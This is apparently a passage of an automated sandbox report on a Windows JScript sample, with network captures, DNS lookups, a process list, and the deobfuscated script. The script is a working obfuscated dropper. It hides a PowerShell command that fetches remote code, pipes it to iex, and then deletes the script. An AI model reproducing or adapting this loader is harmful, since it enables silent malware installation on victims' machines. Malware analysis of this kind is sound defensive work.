Dec 17, 2024 11:31:39.283103943 CET | 80 | 49709 | 142.250.201.4 | 192.168.2.8 |
Dec 17, 2024 11:31:39.283221960 CET | 80 | 49709 | 142.250.201.4 | 192.168.2.8 |
Dec 17, 2024 11:31:39.283312082 CET | 49709 | 80 | 192.168.2.8 | 142.250.201.4 |
Dec 17, 2024 11:31:39.287233114 CET | 80 | 49709 | 142.250.201.4 | 192.168.2.8 |
Dec 17, 2024 11:31:39.287415981 CET | 80 | 49709 | 142.250.201.4 | 192.168.2.8 |
Dec 17, 2024 11:31:39.287482977 CET | 49709 | 80 | 192.168.2.8 | 142.250.201.4 |
Dec 17, 2024 11:31:39.295675039 CET | 80 | 49709 | 142.250.201.4 | 192.168.2.8 |
Dec 17, 2024 11:31:39.295770884 CET | 80 | 49709 | 142.250.201.4 | 192.168.2.8 |
Dec 17, 2024 11:31:39.295945883 CET | 49709 | 80 | 192.168.2.8 | 142.250.201.4 |
Dec 17, 2024 11:31:39.304085016 CET | 80 | 49709 | 142.250.201.4 | 192.168.2.8 |
Dec 17, 2024 11:31:39.304203033 CET | 80 | 49709 | 142.250.201.4 | 192.168.2.8 |
Dec 17, 2024 11:31:39.304260015 CET | 49709 | 80 | 192.168.2.8 | 142.250.201.4 |
Dec 17, 2024 11:31:39.312495947 CET | 80 | 49709 | 142.250.201.4 | 192.168.2.8 |
Dec 17, 2024 11:31:39.312560081 CET | 80 | 49709 | 142.250.201.4 | 192.168.2.8 |
Dec 17, 2024 11:31:39.312628031 CET | 49709 | 80 | 192.168.2.8 | 142.250.201.4 |
Dec 17, 2024 11:31:39.320951939 CET | 80 | 49709 | 142.250.201.4 | 192.168.2.8 |
Dec 17, 2024 11:31:39.321011066 CET | 80 | 49709 | 142.250.201.4 | 192.168.2.8 |
Dec 17, 2024 11:31:39.321280003 CET | 49709 | 80 | 192.168.2.8 | 142.250.201.4 |
Dec 17, 2024 11:31:39.329265118 CET | 80 | 49709 | 142.250.201.4 | 192.168.2.8 |
Dec 17, 2024 11:31:39.329360962 CET | 80 | 49709 | 142.250.201.4 | 192.168.2.8 |
Dec 17, 2024 11:31:39.329426050 CET | 49709 | 80 | 192.168.2.8 | 142.250.201.4 |
Dec 17, 2024 11:31:39.337682009 CET | 80 | 49709 | 142.250.201.4 | 192.168.2.8 |
Dec 17, 2024 11:31:39.337796926 CET | 80 | 49709 | 142.250.201.4 | 192.168.2.8 |
Dec 17, 2024 11:31:39.337865114 CET | 49709 | 80 | 192.168.2.8 | 142.250.201.4 |
Dec 17, 2024 11:31:39.346131086 CET | 80 | 49709 | 142.250.201.4 | 192.168.2.8 |
Dec 17, 2024 11:31:39.346209049 CET | 80 | 49709 | 142.250.201.4 | 192.168.2.8 |
Dec 17, 2024 11:31:39.346275091 CET | 49709 | 80 | 192.168.2.8 | 142.250.201.4 |
Dec 17, 2024 11:31:39.354515076 CET | 80 | 49709 | 142.250.201.4 | 192.168.2.8 |
Dec 17, 2024 11:31:39.354758024 CET | 80 | 49709 | 142.250.201.4 | 192.168.2.8 |
Dec 17, 2024 11:31:39.354824066 CET | 49709 | 80 | 192.168.2.8 | 142.250.201.4 |
Dec 17, 2024 11:31:39.362972975 CET | 80 | 49709 | 142.250.201.4 | 192.168.2.8 |
Dec 17, 2024 11:31:39.363010883 CET | 80 | 49709 | 142.250.201.4 | 192.168.2.8 |
Dec 17, 2024 11:31:39.363076925 CET | 49709 | 80 | 192.168.2.8 | 142.250.201.4 |
Dec 17, 2024 11:31:39.403283119 CET | 80 | 49709 | 142.250.201.4 | 192.168.2.8 |
Dec 17, 2024 11:31:39.403337955 CET | 80 | 49709 | 142.250.201.4 | 192.168.2.8 |
Dec 17, 2024 11:31:39.403512001 CET | 49709 | 80 | 192.168.2.8 | 142.250.201.4 |
Dec 17, 2024 11:31:39.475094080 CET | 80 | 49709 | 142.250.201.4 | 192.168.2.8 |
Dec 17, 2024 11:31:39.475140095 CET | 80 | 49709 | 142.250.201.4 | 192.168.2.8 |
Dec 17, 2024 11:31:39.475474119 CET | 49709 | 80 | 192.168.2.8 | 142.250.201.4 |
Dec 17, 2024 11:31:39.477652073 CET | 80 | 49709 | 142.250.201.4 | 192.168.2.8 |
Dec 17, 2024 11:31:39.477672100 CET | 80 | 49709 | 142.250.201.4 | 192.168.2.8 |
Dec 17, 2024 11:31:39.477735043 CET | 49709 | 80 | 192.168.2.8 | 142.250.201.4 |
Dec 17, 2024 11:31:39.482579947 CET | 80 | 49709 | 142.250.201.4 | 192.168.2.8 |
Dec 17, 2024 11:31:39.482608080 CET | 80 | 49709 | 142.250.201.4 | 192.168.2.8 |
Dec 17, 2024 11:31:39.482654095 CET | 49709 | 80 | 192.168.2.8 | 142.250.201.4 |
Dec 17, 2024 11:31:39.487818003 CET | 80 | 49709 | 142.250.201.4 | 192.168.2.8 |
Dec 17, 2024 11:31:39.487876892 CET | 80 | 49709 | 142.250.201.4 | 192.168.2.8 |
Dec 17, 2024 11:31:39.488025904 CET | 49709 | 80 | 192.168.2.8 | 142.250.201.4 |
Dec 17, 2024 11:31:39.492645025 CET | 80 | 49709 | 142.250.201.4 | 192.168.2.8 |
Dec 17, 2024 11:31:39.492683887 CET | 80 | 49709 | 142.250.201.4 | 192.168.2.8 |
Dec 17, 2024 11:31:39.492739916 CET | 49709 | 80 | 192.168.2.8 | 142.250.201.4 |
Dec 17, 2024 11:31:39.497639894 CET | 80 | 49709 | 142.250.201.4 | 192.168.2.8 |
Dec 17, 2024 11:31:39.497849941 CET | 80 | 49709 | 142.250.201.4 | 192.168.2.8 |
Dec 17, 2024 11:31:39.497945070 CET | 49709 | 80 | 192.168.2.8 | 142.250.201.4 |
Dec 17, 2024 11:31:39.502429962 CET | 80 | 49709 | 142.250.201.4 | 192.168.2.8 |
Dec 17, 2024 11:31:39.544816971 CET | 49709 | 80 | 192.168.2.8 | 142.250.201.4 |
Dec 17, 2024 11:31:39.822983027 CET | 49708 | 80 | 192.168.2.8 | 45.61.137.71 |
Dec 17, 2024 11:31:39.823185921 CET | 49709 | 80 | 192.168.2.8 | 142.250.201.4 |
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Dec 17, 2024 11:31:35.368026972 CET | 49360 | 53 | 192.168.2.8 | 1.1.1.1 |
Dec 17, 2024 11:31:35.506645918 CET | 53 | 49360 | 1.1.1.1 | 192.168.2.8 |
Dec 17, 2024 11:31:37.418728113 CET | 50947 | 53 | 192.168.2.8 | 1.1.1.1 |
Dec 17, 2024 11:31:37.556037903 CET | 53 | 50947 | 1.1.1.1 | 192.168.2.8 |
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS |
---|---|---|---|---|---|---|---|---|
Dec 17, 2024 11:31:35.368026972 CET | 192.168.2.8 | 1.1.1.1 | 0x9852 | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Dec 17, 2024 11:31:37.418728113 CET | 192.168.2.8 | 1.1.1.1 | 0x9c95 | Standard query (0) | A (IP address) | IN (0x0001) | false |
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS |
---|---|---|---|---|---|---|---|---|---|---|
Dec 17, 2024 11:31:35.506645918 CET | 1.1.1.1 | 192.168.2.8 | 0x9852 | No error (0) | 45.61.137.71 | A (IP address) | IN (0x0001) | false | ||
Dec 17, 2024 11:31:37.556037903 CET | 1.1.1.1 | 192.168.2.8 | 0x9c95 | No error (0) | 142.250.201.4 | A (IP address) | IN (0x0001) | false |
|
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
0 | 192.168.2.8 | 49708 | 45.61.137.71 | 80 | 7836 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
Dec 17, 2024 11:31:35.824373007 CET | 176 | OUT | |
Dec 17, 2024 11:31:37.415682077 CET | 166 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
1 | 192.168.2.8 | 49709 | 142.250.201.4 | 80 | 7836 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
Dec 17, 2024 11:31:37.678965092 CET | 159 | OUT | |
Dec 17, 2024 11:31:39.091379881 CET | 1236 | IN | |
Dec 17, 2024 11:31:39.091440916 CET | 1236 | IN | |
Dec 17, 2024 11:31:39.091478109 CET | 1236 | IN | |
Dec 17, 2024 11:31:39.091511011 CET | 1236 | IN | |
Dec 17, 2024 11:31:39.091543913 CET | 1236 | IN | |
Dec 17, 2024 11:31:39.091593981 CET | 1236 | IN | |
Dec 17, 2024 11:31:39.091628075 CET | 776 | IN | |
Dec 17, 2024 11:31:39.091666937 CET | 1236 | IN | |
Dec 17, 2024 11:31:39.091811895 CET | 1236 | IN | |
Dec 17, 2024 11:31:39.091849089 CET | 1236 | IN | |
Dec 17, 2024 11:31:39.211682081 CET | 1236 | IN |
Click to jump to process
Click to jump to process
back
Click to dive into process behavior distribution
Click to jump to process
Target ID: | 0 |
Start time: | 05:31:05 |
Start date: | 17/12/2024 |
Path: | C:\Windows\System32\wscript.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff6ff8a0000 |
File size: | 170'496 bytes |
MD5 hash: | A47CBE969EA935BDD3AB568BB126BC80 |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 3 |
Start time: | 05:31:31 |
Start date: | 17/12/2024 |
Path: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff6cb6b0000 |
File size: | 452'608 bytes |
MD5 hash: | 04029E121A0CFA5991749937DD22A1D9 |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 4 |
Start time: | 05:31:31 |
Start date: | 17/12/2024 |
Path: | C:\Windows\System32\conhost.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff6ee680000 |
File size: | 862'208 bytes |
MD5 hash: | 0D698AF330FD17BEE3BF90011D49251D |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Call Graph
Graph
- Executed
- Not Executed
Script: |
---|
Code | ||
---|---|---|
0 | WScript.Sleep ( 25000 ); |
|
1 | var QNBvQX0jhaIvITPZCcn2rjLW7Spmqrdv7OTzMio1D = "72,84,84,80,26,15,15,77,66,85,90,89,19,89,86,90,87,19,82,14,84,79,80,15,17,14,80,72,80,31,83,29,77,73,78,84,83,17,19"; | |
2 | function OSbmnwBUMyABGVq5kiJel6TAidu0naN0lFiRPaNM56iSBOgrubjeWvTWOSfUckGWZK6s35WAHIPB17pDU0WR1MxN2qQhA() { |
|
3 | var script1 = QNBvQX0jhaIvITPZCcn2rjLW7Spmqrdv7OTzMio1D.split ( ',' ); |
|
4 | var dBRCpmIVP8tiPqnS5Oy3Fb8CdDllLhzpFlvyJHrSv4iHjOSbmnwBUMyABGVq5kiJel6TAidu0naN0lFiRPaNM56iSBOgrubjeWvTWOSfUckGWZK6s35WAHIPB17pDU0WR1MxN2qQhA = []; | |
5 | var QNBvQX0jhaIvITPZCcn2rjLW7Spmqrdv7OTzMio1DdBRCpmIVP8tiPqnS5Oy3Fb8CdDllLhzpFlvyJHrSv4iHj = ''; | |
6 | for ( var dBRCpmIVP8tiPqnS5Oy3Fb8CdDllLhzpFlvyJHrSv4iHje9HvIXYeUZCgDHK3HsKbnZjf4AaHgaZ2em61hK4KRpJ = 0 ; dBRCpmIVP8tiPqnS5Oy3Fb8CdDllLhzpFlvyJHrSv4iHje9HvIXYeUZCgDHK3HsKbnZjf4AaHgaZ2em61hK4KRpJ < script1.length ; dBRCpmIVP8tiPqnS5Oy3Fb8CdDllLhzpFlvyJHrSv4iHje9HvIXYeUZCgDHK3HsKbnZjf4AaHgaZ2em61hK4KRpJ ++ ) | |
7 | { | |
8 | dBRCpmIVP8tiPqnS5Oy3Fb8CdDllLhzpFlvyJHrSv4iHjOSbmnwBUMyABGVq5kiJel6TAidu0naN0lFiRPaNM56iSBOgrubjeWvTWOSfUckGWZK6s35WAHIPB17pDU0WR1MxN2qQhA.push ( String.fromCharCode ( script1[dBRCpmIVP8tiPqnS5Oy3Fb8CdDllLhzpFlvyJHrSv4iHje9HvIXYeUZCgDHK3HsKbnZjf4AaHgaZ2em61hK4KRpJ] ^ 5 * 6 + 0.25 * 8 ) ); | |
9 | } | |
10 | for ( var dBRCpmIVP8tiPqnS5Oy3Fb8CdDllLhzpFlvyJHrSv4iHje9HvIXYeUZCgDHK3HsKbnZjf4AaHgaZ2em61hK4KRpJ = 0 ; dBRCpmIVP8tiPqnS5Oy3Fb8CdDllLhzpFlvyJHrSv4iHje9HvIXYeUZCgDHK3HsKbnZjf4AaHgaZ2em61hK4KRpJ < dBRCpmIVP8tiPqnS5Oy3Fb8CdDllLhzpFlvyJHrSv4iHjOSbmnwBUMyABGVq5kiJel6TAidu0naN0lFiRPaNM56iSBOgrubjeWvTWOSfUckGWZK6s35WAHIPB17pDU0WR1MxN2qQhA.length ; dBRCpmIVP8tiPqnS5Oy3Fb8CdDllLhzpFlvyJHrSv4iHje9HvIXYeUZCgDHK3HsKbnZjf4AaHgaZ2em61hK4KRpJ ++ ) | |
11 | { | |
12 | QNBvQX0jhaIvITPZCcn2rjLW7Spmqrdv7OTzMio1DdBRCpmIVP8tiPqnS5Oy3Fb8CdDllLhzpFlvyJHrSv4iHj += dBRCpmIVP8tiPqnS5Oy3Fb8CdDllLhzpFlvyJHrSv4iHjOSbmnwBUMyABGVq5kiJel6TAidu0naN0lFiRPaNM56iSBOgrubjeWvTWOSfUckGWZK6s35WAHIPB17pDU0WR1MxN2qQhA[dBRCpmIVP8tiPqnS5Oy3Fb8CdDllLhzpFlvyJHrSv4iHje9HvIXYeUZCgDHK3HsKbnZjf4AaHgaZ2em61hK4KRpJ]; | |
13 | } | |
14 | return QNBvQX0jhaIvITPZCcn2rjLW7Spmqrdv7OTzMio1DdBRCpmIVP8tiPqnS5Oy3Fb8CdDllLhzpFlvyJHrSv4iHj; | |
15 | } | |
16 | var e9HvIXYeUZCgDHK3HsKbnZjf4AaHgaZ2em61hK4KRpJ = [ "10b2", "10b6", "1086", "1097", "108c", "1095", "1091", "10cb", "10b6", "108d", "1080", "1089", "1089" ]; | |
17 | var fjZ7Iiu9v01XhVSxrM8os9TsWrSi6YcTVW1dlD = WScript.CreateObject ( String.fromCharCode.apply ( null, |
|
18 | function () { |
|
19 | var uv9CB6t1xh7AR = 0; | |
20 | var dBRCpmIVP8tiPqnS5Oy3Fb8CdDllLhzpFlvyJHrSv4iHj = []; | |
21 | while (uv9CB6t1xh7AR < e9HvIXYeUZCgDHK3HsKbnZjf4AaHgaZ2em61hK4KRpJ.length ) | |
22 | { | |
23 | dBRCpmIVP8tiPqnS5Oy3Fb8CdDllLhzpFlvyJHrSv4iHj.push ( parseInt ( e9HvIXYeUZCgDHK3HsKbnZjf4AaHgaZ2em61hK4KRpJ[uv9CB6t1xh7AR], 2 * 4 * 2 ) ^ ( 500 * 8 + 50 * 6 + 5 * 5 ) ); |
|
24 | uv9CB6t1xh7AR ++; | |
25 | } | |
26 | return dBRCpmIVP8tiPqnS5Oy3Fb8CdDllLhzpFlvyJHrSv4iHj; | |
27 | } ( ) ) ) ; | |
28 | function e9HvIXYeUZCgDHK3HsKbnZjf4AaHgaZ2em61hK4KRpJgkldfjnr() { |
|
29 | var fjZ7Iiu9v01XhVSxrM8os9TsWrSi6YcTVW1dlD = [ "16c27", "16c38", "16c20", "16c32", "16c25", "16c24", "16c3f", "16c32", "16c3b", "16c3b", "16c77", "16c7a", "16c39", "16c38", "16c27", "16c25", "16c38", "16c31", "16c3e", "16c3b", "16c32", "16c77", "16c7a", "16c32", "16c2f", "16c32", "16c34", "16c22", "16c23", "16c3e", "16c38", "16c39", "16c27", "16c38", "16c3b", "16c3e", "16c34", "16c2e", "16c77", "16c35", "16c2e", "16c27", "16c36", "16c24", "16c24", "16c77", "16c7a", "16c00", "16c3e", "16c39", "16c33", "16c38", "16c20", "16c04", "16c23", "16c2e", "16c3b", "16c32", "16c77", "16c3f", "16c3e", "16c33", "16c33", "16c32", "16c39", "16c77", "16c7a", "16c34", "16c77", "16c75", "16c34", "16c22", "16c25", "16c3b", "16c77", "16c7a", "16c22", "16c24", "16c32", "16c35", "16c77", "16c70" ]; | |
30 | return fjZ7Iiu9v01XhVSxrM8os9TsWrSi6YcTVW1dlD; | |
31 | } | |
32 | fjZ7Iiu9v01XhVSxrM8os9TsWrSi6YcTVW1dlD.Run ( |
|
33 | function () { |
|
34 | var TF1RofqohJJfSVVN2 = ''; | |
35 | var fjZ7Iiu9v01XhVSxrM8os9TsWrSi6YcTVW1dlDuv9CB6t1xh7AR = e9HvIXYeUZCgDHK3HsKbnZjf4AaHgaZ2em61hK4KRpJgkldfjnr ( ).length; |
|
36 | for ( var TF1RofqohJJfSVVN22134dfss = 0 ; TF1RofqohJJfSVVN22134dfss < fjZ7Iiu9v01XhVSxrM8os9TsWrSi6YcTVW1dlDuv9CB6t1xh7AR ; TF1RofqohJJfSVVN22134dfss ++ ) | |
37 | { | |
38 | TF1RofqohJJfSVVN2 += String.fromCharCode ( parseInt ( e9HvIXYeUZCgDHK3HsKbnZjf4AaHgaZ2em61hK4KRpJgkldfjnr ( ) [TF1RofqohJJfSVVN22134dfss], 0.25 * 8 * 2 * 2 * 0.5 * 4 ) ^ ( 11.25 * 8 * 1000 + 9.375 * 320 + 12.5 * 16 + 3.5 * 20 + 1 ) ); |
|
39 | } | |
40 | return TF1RofqohJJfSVVN2; | |
41 | } ( ) + OSbmnwBUMyABGVq5kiJel6TAidu0naN0lFiRPaNM56iSBOgrubjeWvTWOSfUckGWZK6s35WAHIPB17pDU0WR1MxN2qQhA ( ) + "' | i" + String.fromCharCode ( parseInt ( ( ( 20 * 4 * 10 ) ^ ( ( 100 + 73 ) * 5 ) ), 2 * 2 * 4 ) ) + "x\"" ) ; | |
42 | var uv9CB6t1xh7AR = WScript.CreateObject ( "Scripting.FileSystemObject" ); |
|
43 | uv9CB6t1xh7AR.DeleteFile ( WScript.ScriptFullName ); |
|
Function 00007FFB4A242D0A Relevance: .5, Instructions: 468COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00007FFB4A1733B5 Relevance: .0, Instructions: 49COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Strings |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|